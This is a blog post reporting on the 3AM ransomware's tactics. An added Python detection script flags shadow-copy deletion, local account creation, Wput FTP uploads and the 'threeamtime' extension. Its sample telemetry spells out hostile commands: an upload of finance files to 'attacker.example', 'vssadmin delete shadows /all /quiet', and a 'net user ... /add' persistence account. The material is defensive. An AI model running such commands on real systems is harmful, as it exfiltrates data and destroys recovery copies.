New Ransomware Strain 3AM Surfaces, Posing Significant Threat to Businesses

In a recent development, a novel ransomware strain named "3AM" has surfaced and caught the attention of cybersecurity experts. A division of Broadcom uncovered the new malware during an incident investigation. Unlike previously known ransomware families, 3AM is written in the Rust language, which is still rare in the threat landscape and, according to the report, makes the encrypted files more difficult for researchers to decrypt.

According to the findings, this new strain shows distinctive behaviour. It begins its attack by halting multiple services on the compromised system before starting file encryption. Once encryption is complete, the ransomware attempts to erase Volume Shadow Copy Service (VSS) copies, making data recovery more difficult for victims.

The malware takes its name from a reference in the ransom note, and it appends the "threeamtime" extension to each encrypted file. Notably, it remains unclear whether the creators of this ransomware have ties to established cybercriminal groups.

In a documented attack observed by the team, the threat actor deployed 3AM on three machines within the target organization's network. However, security measures successfully blocked the ransomware on two of these machines.

What makes this intrusion noteworthy is the attacker's use of Cobalt Strike for post-exploitation activity and privilege escalation. Reconnaissance (survey) commands were then executed to identify other servers for lateral movement. The initial entry point used in the attack remains undisclosed.

The attackers also added a new user account for persistence and used the Wput tool to exfiltrate victim files to an FTP server under their control.

3AM, a 64-bit executable written in Rust, systematically disables various security and backup-related software, selectively encrypts files based on predefined criteria, and purges volume shadow copies. Although the exact origins of this ransomware are unknown, evidence suggests that the affiliate involved in the attack may have targeted other entities, as indicated by a Reddit post from September 9, 2023.
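The behaviours listed above are all visible in ordinary endpoint telemetry, so a defender can look for them without any sample of the malware. The Python script below is an added example, not code from the article or from the research team that analysed 3AM. It runs simple detection logic over a handful of constructed process-creation and file-write events and alerts when several of the described behaviours (shadow copy deletion, a newly added local account, Wput uploading to an FTP server, files renamed with the threeamtime extension) occur on the same host. The event format, host names, user names and command lines are constructed for the example, and the assumption that vssadmin is the tool used to delete shadow copies is mine; the article only says the copies are erased, not how.

```python
import re
from typing import Dict, List, Pattern, Set, Tuple

# Constructed sample telemetry for this example. None of these hosts, users,
# command lines or paths come from the article or from any real incident.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"type": "process", "host": "fs01", "user": "CORP\\jdoe",
     "cmdline": "net user backupsvc Summer2023 /add"},
    {"type": "process", "host": "fs01", "user": "CORP\\backupsvc",
     "cmdline": "wput.exe -u C:\\Share\\finance\\*.xlsx ftp://attacker.example/drop/"},
    {"type": "process", "host": "fs01", "user": "NT AUTHORITY\\SYSTEM",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"type": "file", "host": "fs01", "user": "NT AUTHORITY\\SYSTEM",
     "path": "C:\\Share\\finance\\q3-forecast.xlsx.threeamtime"},
    # Benign activity on another host, so the detector has something to ignore.
    {"type": "process", "host": "ws07", "user": "CORP\\alice",
     "cmdline": "notepad.exe C:\\Users\\alice\\notes.txt"},
    {"type": "file", "host": "ws07", "user": "CORP\\alice",
     "path": "C:\\Users\\alice\\notes.txt"},
]

# Each rule: (name, event type it applies to, pattern over the cmdline or path).
RULES: List[Tuple[str, str, Pattern[str]]] = [
    # Assumption: vssadmin is one common way to delete shadow copies. The
    # article does not name the tool 3AM uses, so treat this as an example rule.
    ("shadow_copy_deletion", "process",
     re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b", re.I)),
    # Local account creation with "net user <name> [<password>] /add".
    ("local_account_created", "process",
     re.compile(r"\bnet1?(?:\.exe)?\s+user\s+\S+(?:\s+\S+)?\s+/add\b", re.I)),
    # Wput invoked with an FTP destination, as described for the exfiltration step.
    ("wput_ftp_upload", "process",
     re.compile(r"\bwput(?:\.exe)?\b.*\bftp://", re.I)),
    # File written with the extension the article reports for encrypted files.
    ("threeamtime_extension", "file",
     re.compile(r"\.threeamtime$", re.I)),
]

# Alert only when at least this many distinct behaviours co-occur on one host.
# A lone vssadmin run or account creation is routine admin work; the
# combination is what resembles the intrusion described.
MIN_BEHAVIOURS = 2


def match_rules(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule a single event triggers, in RULES order."""
    text = event.get("cmdline") if event["type"] == "process" else event.get("path")
    if not text:
        return []
    return [name for name, etype, pattern in RULES
            if etype == event["type"] and pattern.search(text)]


def hits_per_host(events: List[Dict[str, str]]) -> Dict[str, Set[str]]:
    """Collect the set of distinct triggered behaviours for each host."""
    hits: Dict[str, Set[str]] = {}
    for event in events:
        for name in match_rules(event):
            hits.setdefault(event["host"], set()).add(name)
    return hits


def detect(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Return {host: sorted behaviour names} for hosts that cross the threshold."""
    return {host: sorted(names)
            for host, names in hits_per_host(events).items()
            if len(names) >= MIN_BEHAVIOURS}


if __name__ == "__main__":
    for host, behaviours in detect(SAMPLE_EVENTS).items():
        print(f"ALERT {host}: {', '.join(behaviours)}")
```

The per-host aggregation is the important design choice: each rule on its own would fire on legitimate administration, but shadow copy deletion followed by a new account and an FTP upload on the same server is the sequence worth paging someone for. In a real deployment the events would come from an EDR or Sysmon feed rather than an inline list, and the threshold and patterns would be tuned to the environment.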

The research team's principal intelligence analyst also stressed the potential threat posed by 3AM, especially given its use as a fallback by a LockBit affiliate. This underscores the evolving ransomware landscape, in which affiliates show increasing independence from the operators whose tooling they use.

While many new ransomware families emerge and fade quickly, the fact that 3AM is considered a credible threat by experienced cybercriminals raises concerns about its potential resurgence in future attacks. The cybersecurity community will continue to monitor and analyze this evolving threat landscape.

Essential Tips for Protecting Yourself from the 3AM Ransomware Threat

To shield yourself from the 3AM ransomware threat, it's essential to take proactive steps. Start by educating yourself and your team about ransomware attacks, familiarizing them with common tactics and how to spot phishing emails and other malicious content. Keeping your software up to date is also crucial, as updates often contain security patches that close the vulnerabilities ransomware is known to exploit. Deploy a robust security solution capable of detecting and preventing ransomware attacks to strengthen your system's defenses. Finally, back up your data regularly so that you hold a secure copy even if a ransomware compromise succeeds. These precautions can help safeguard against the evolving threat posed by ransomware like 3AM.

Author: Priil Tech Nerds